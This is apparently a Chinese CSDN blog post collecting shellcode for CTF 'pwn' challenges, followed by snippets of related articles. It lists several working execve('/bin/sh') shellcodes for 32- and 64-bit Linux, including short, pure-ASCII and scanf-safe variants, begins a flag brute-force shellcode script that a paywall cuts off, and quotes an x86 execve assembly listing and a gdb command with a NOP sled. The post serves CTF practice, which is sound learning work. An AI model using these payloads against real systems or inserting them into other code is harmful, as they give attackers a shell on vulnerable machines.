pwn题shellcode收集

最新推荐文章于 2025-03-02 14:24:26 发布
最新推荐文章于 2025-03-02 14:24:26 发布
阅读量5.4k 收藏 36
点赞数 13
分类专栏: pwn ctf 网络安全 文章标签: pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/114106118
版权
这篇博客整理了pwn题目中常见的shellcode,包括execve和cmp flag byte的shellcode实例,便于读者参考和在解决pwn问题时使用。在无法直接获取flag的情况下,文章还介绍了如何通过shellcode实现爆破逻辑。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Write Up

shellcode --> execve

  这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。

# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

shellcode --> cmp flag byte

  下面的代码是在无法输出flag时,尝试用shellcode实现一个爆破逻辑,当flag的字符与我们猜想的字符一致时代码将会陷入循环,如此来爆破flag。

from pwn import *
import string


# # 这里的pwn只是为了演示流程,具体逻辑还得看题目
def pwn
最低0.47元/天 解锁文章
PWN-shellcode
MuMuLee_的博客
09-26 1927
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
CTF比赛PWNsgtlibc通用快速解框架
serfend's blog
07-07 1807
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn框架例:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例:buuctf pwnable_orw libc-leak_x86_puts 例:ctfshow ret2libc_64 内部赛_签到 libc-leak_x86_write_pure 例:buuctf jarvisoj_level1 libc-leak_x86_writ
shellcode
WEB安全测试学习中……
03-09 1228
<br />Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。<br />另外,Shellcode一般是作为数据发送给受攻击服务的。 <br />Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shell
CTF中pwn shellcode
saulgoodman的博客
03-02 776
下面是一些shellcode代码和绕过技巧。一些只给payload或者exp一把梭首先给出两个常用shellcode仓库,可以检索需要的shellcode
PWN知识点整理(1)Shellcode
qq_52469954的博客
10-26 348
0day安全:软件漏洞分析技术(第2版)
pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1382
编写简单的shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
二进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1880
帮助二进制安全爱好者入门~
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 986
最近在学习pwn,这是一道2016年的pwn目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
PWN-shellcode-WP- (一)目文件.rar
03-29
为几道搜集的真,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真
PWN基础10:Ret2Shellcode 32位实例
prettyX的博客
07-14 1164
0x01 Ret2Text的局限性
deepseek 小弟弟崇拜你啊 ai 自己出pwn 自己做
nn_84的博客
02-19 1067
汇编语言 写ctf pwn目<think> 好,我现在要写一个关于用AI和逆向工程来解决CTF PWN目的思考过程。首先,我得明确什么是CTF中的PWN目,通常这类目涉及堆栈溢出、缓冲区溢出等漏洞利用,而AI在这里可能用于分析二进制文件或者生成payload。第一步,我需要了解用户的问:他们想用汇编语言编写一个CTF PWN目,并且提到使用AI。所以用户可能是CTF参赛者或组织者,希望设计一道涉及逆向工程和漏洞利用的目。接下来,我应该考虑如何将AI工具(如深度求索的模型)应用到这个过程中。A
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
pwn shellcode
doudoudedi
11-03 812
漏洞函数很简单没开任何保护直接写入shellcoe读flag这里只允许open read write exp: from pwn import * import pwnlib context_arch='amd64' #p=process('./bad') p=remote('pwnto.fun',12301) elf=ELF('./bad') buf_addr=0x123000 jmp_rsp...
PWN-shellcode-WP- (一)
qq_43390703的博客
03-29 1352
BITSCTF 2017-Command_Line、CSAW Quals CTF 2017-pilot、BSides San Francisco CTF 2017-b_64_b_tuff、 Openctf 2016-tyro_shellcode1比赛WP,从栈的结构、排列,汇编底层去分析理解,一步一步的解过程,通俗易懂且详细
pwn-shellcode执行
GalaxySpaceX的博客
08-23 1399
pwn-shellcode执行
第二道pwnshellcode
小白垃圾笔记2
03-08 785
rbp:保存的是栈中当前执行函数的基本地址。当前执行函数所有存储在。这里使用了视频说这里用了 call rax所以不能用F5。查看文件类型和保护,虽然现在的我·还没有明白太多的保护。那么如果我们输入shellcode不久获取到了权限了吗。最重要的是最后,call rax,[rbp+buf]栈上的数据都要靠rbp指针加上偏移量来读取。rsp:栈指针,永远指向栈顶。他的意思就是执行输入的内容。64位,放到ida里边。
shellcode基本知识(PWN
weixin_51758733的博客
07-15 1037
shellcode基本知识(PWN
PWN入门(6)写入shellcode
Ba1_Ma0的博客
09-20 2252
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入05文件夹。
pwnshellcode revenge --0~9,A~Z字符的shellcode
question55的博客
12-02 151
payload += b'\x31\x42\x38' #31 42 38 xor DWORD PTR [rdx+0x38], eax 减syscall后面代码变成nop,为后面执行shellcode做准备。payload += b'\x31\x42\x30' #31 42 30 xor DWORD PTR [rdx+0x30], eax 将\x4e\x44异或成syscall的十六进制数。
pwn college Shellcode Injection
最新发布
04-02
### Pwn College中的Shellcode Injection教程概述 在Pwn College中,`Shellcode Injection` 是一种常见的攻击技术,用于向目标程序注入并执行自定义的机器代码(即shellcode)。这种技术通常涉及以下几个方面: #### 1. **理解Shellcode的工作原理** Shellcode是一种小型的可执行代码片段,通常以十六进制形式表示。它的主要目的是在成功利用漏洞后,在目标系统上执行特定操作。例如,最常见的用途是打开一个交互式的shell[^3]。 在Linux x86架构下,获取shell的标准方法是通过调用 `execve("/bin/sh", NULL, NULL)` 系统调用来启动一个新的shell进程[^4]。 #### 2. **编写简单的Shellcode** 编写Shellcode的过程可以分为几个部分: - **确定功能需求**:例如,获取shell、连接远程服务器等。 - **汇编代码开发**:使用汇编语言实现所需的功能。以下是一个典型的x86 Linux下的shellcode示例: ```nasm global _start section .text _start: xor eax, eax ; 清零eax寄存器 push eax ; 将NULL压入栈中 (作为字符串结束符) push 0x68732f2f ; 推送 "//sh" 到栈中 push 0x6e69622f ; 推送 "/bin" 到栈中 mov ebx, esp ; 将指向"/bin//sh"的指针存储到ebx push eax ; 压入另一个NULL (argv数组的结尾) mov edx, esp ; edx现在指向NULL push ebx ; 压入指向"/bin//sh"的指针 mov ecx, esp ; ecx现在指向argv数组 mov al, 0xb ; 设置系统调用号为execve(11) int 0x80 ; 调用中断触发系统调用 ``` - **转换为机器码**:将上述汇编代码编译成二进制格式,并提取其原始字节序列以便嵌入到exploit中[^5]。 #### 3. **注入与执行Shellcode** 注入Shellcode的方式多种多样,具体取决于目标程序中存在的漏洞类型。以下是几种常见场景及其对应的解决策略: - **缓冲区溢出**:当存在未受保护的堆栈空间时,可以通过覆盖返回地址来跳转至已加载的shellcode位置[^1]。 - **ROP链构建**:如果NX位启用,则需借助Return-Oriented Programming绕过内存保护机制[^2]。 #### 4. **测试与调试** 使用工具如GDB或PEDA可以帮助开发者逐步跟踪程序行为,验证shellcode是否按预期运行以及定位潜在错误所在之处。 ```bash gdb ./vulnerable_program break *main+<offset> run $(python -c 'print("\x90"*100 + "\x31\xc0\x50...")') ``` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值